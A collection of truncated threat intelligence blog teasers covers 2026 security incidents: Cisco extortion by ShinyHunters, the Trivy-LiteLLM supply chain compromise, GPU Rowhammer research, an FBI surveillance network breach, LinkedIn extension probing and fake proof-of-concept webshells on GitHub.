Cisco has been removed from ShinyHunters' dark web leak site. The listing that threatened to dump 3 million Salesforce records, 300 private GitHub repositories, AI product source code, and FBI/IRS/NASA customer data — gone. As of this morning, every other victim is still listed. Cisco is not. In the ransomware world, removal from a leak site means one thing: the victim paid. Cisco has not confirmed payment. They won't. But the $57 billion company that sells firewalls, intrusi

On April 1, we published "One Actor, Three Supply Chains" — documenting how TeamPCP chained Trivy → LiteLLM → Telnyx, each compromise funding the next. We said the chain doesn't stop when the vendor publishes a blog post. It stops when the credentials expire. The credentials haven't expired. Today we learned the chain reaches Cisco. And the European Commission. And potentially the FBI, IRS, and NASA. The Full Chain Aqua Security's Trivy (security scanner) ↓ TeamPCP poisoned 7

Two research teams dropped papers yesterday showing that NVIDIA GPUs are vulnerable to Rowhammer attacks. Not theoretical. Not in a lab. Hundreds to thousands of bit flips on production hardware — RTX 3060, RTX A6000 — giving the attacker full control of the host machine through the GPU's memory. The GPU that trains your AI model. The GPU that renders your cloud workload. The GPU that powers the inference engine your customers depend on. It's an attack surface. It always was.

CMMC Level 2 requires 110 security controls from NIST SP 800-171. It's the standard every defense contractor must meet to handle Controlled Unclassified Information. Companies spend $34,000 to $112,000 on assessments. They hire compliance teams. They buy GRC platforms. They struggle. We're two people in Minneapolis running a threat intelligence platform on $600 a month. We've implemented 78 of 110 controls. Not because we were trying to pass an audit. Because we were building

It's Thursday, April 3. ShinyHunters' deadline to dump Cisco's data expires today. This is the fifth simultaneous crisis hitting Cisco in seven days. Nobody's had a week this bad. The Scoreboard # Crisis Severity Status 1 CVE-2026-20131 — FMC zero-day (CVSS 10.0) Maximum Exploited 36 days before disclosure. Interlock ransomware used it to hit hospitals and Saint Paul, MN. Amazon found it, not Cisco. 2 ShinyHunters extortion — 3M+ Salesforce records Critical Three breach vecto

The FBI just told Congress that the breach of its wiretap and surveillance network qualifies as a "major incident." The former deputy assistant director of the FBI's cyber division says she can't recall the bureau making that determination about its own systems since at least 2020. The affected system manages electronic surveillance — wiretaps, pen registers, trap and trace data, and personally identifiable information on subjects of FBI investigations. The people the FBI is

Every time you visit LinkedIn, a 2.7 megabyte JavaScript file loads in your browser. Inside it: 6,222 hardcoded Chrome extension IDs. The code probes each one — sending fetch() requests to chrome-extension:// URLs to detect what you have installed. The results go to LinkedIn's telemetry servers. You were never asked. LinkedIn's privacy policy doesn't mention it. And a LinkedIn Senior Manager admitted under sworn affidavit that the company has "extension detection mechanisms"

GreyNoise analyzed 4 billion malicious sessions over three months. The finding: 78% of them evaded IP reputation checks entirely. Not because the attackers were sophisticated. Not because the blocklists were outdated. Because the traffic came from your neighbor's WiFi. The Residential Proxy Problem 39% of the malicious sessions in GreyNoise's study originated from home networks. Real residential IP addresses. Real ISPs. Addresses that have never been on a blocklist because th

Yesterday the IRGC named 18 American companies as military targets. Today we went hunting on GitHub for the exploit code that's already being staged against them. We found webshells disguised as security research. Full exploitation toolkits published the day before CISA deadlines. Java GUI "exploit tools" committed with debug logs. And nobody paying attention. This is the wasteland. The space between a CVE disclosure and a patch deployment where attackers stage their tools in

Yesterday at 8 PM Tehran time, the Islamic Revolutionary Guard Corps published a list of 18 American technology companies it considers "legitimate military targets." For every assassination of an Iranian leader, an American company will be destroyed. Employees were told to leave their workplaces immediately. The list: Apple. Google. Meta. Microsoft. Nvidia. Intel. Cisco. HP. Dell. Oracle. IBM. Palantir. Tesla. Boeing. General Electric. JPMorgan Chase. Spire Solutions. G42. We

Hasbro filed an SEC disclosure today confirming a cyberattack detected on March 28. Systems are down. Hackers may still be inside. Recovery will take "several weeks." The company that owns Transformers, Dungeons & Dragons, Magic: The Gathering, Peppa Pig, Monopoly, and My Little Pony is operating on business continuity plans. Every outlet is reporting the same thing: Hasbro got hacked, we don't know by whom, no ransomware claim yet, spokesperson won't answer questions. We loo

Tonight at 9 PM Eastern, the President addresses the nation on the Iran war. The Strait of Hormuz is contested. Isfahan steel plants are burning. Oil futures are swinging on every Truth Social post. Iran says the strait is "fully under their control." Trump says it'll be over in two to three weeks. That's the kinetic war. The other war — the one that hit a $22 billion medical device manufacturer, the FBI Director's personal email, and Lockheed Martin's hiring pipeline — has b

I worked at Dell EMC. I sat in the rooms where they talked about convergence, hyper-convergence, the $67 billion acquisition that was supposed to make Dell the most complete infrastructure company on earth. VxRail, VxBlock, VMAX, Unity, Isilon, Data Domain, Avamar, RecoverPoint. The storage portfolio to end all storage portfolios. RecoverPoint was the disaster recovery product. The one that replicated your virtual machines to a secondary site so when the primary burns down, y

On January 14, 2026, we found a fake Cisco Firepower Management Center proof-of-concept on GitHub. It wasn't a PoC. It was a webshell disguised as one — a Pattern 38 supply chain attack targeting security researchers who test vulnerabilities for a living. We published the findings. We reported the repo. Twelve days later, on January 26, someone started exploiting the real Cisco FMC for real. Not a fake PoC. Not a webshell in a GitHub repo. A CVSS 10.0 unauthenticated remote c

On March 19, someone poisoned 76 of 77 release tags in Aqua Security's Trivy-Action GitHub repository. The credential stealer ran silently inside CI/CD pipelines — the security scanner stealing secrets from the infrastructure it was trusted to protect. Five days later, malicious versions of LiteLLM appeared on PyPI. Same actor. Different package. Same technique: harvest environment variables, .env files, and shell histories from every machine that imported the package. Three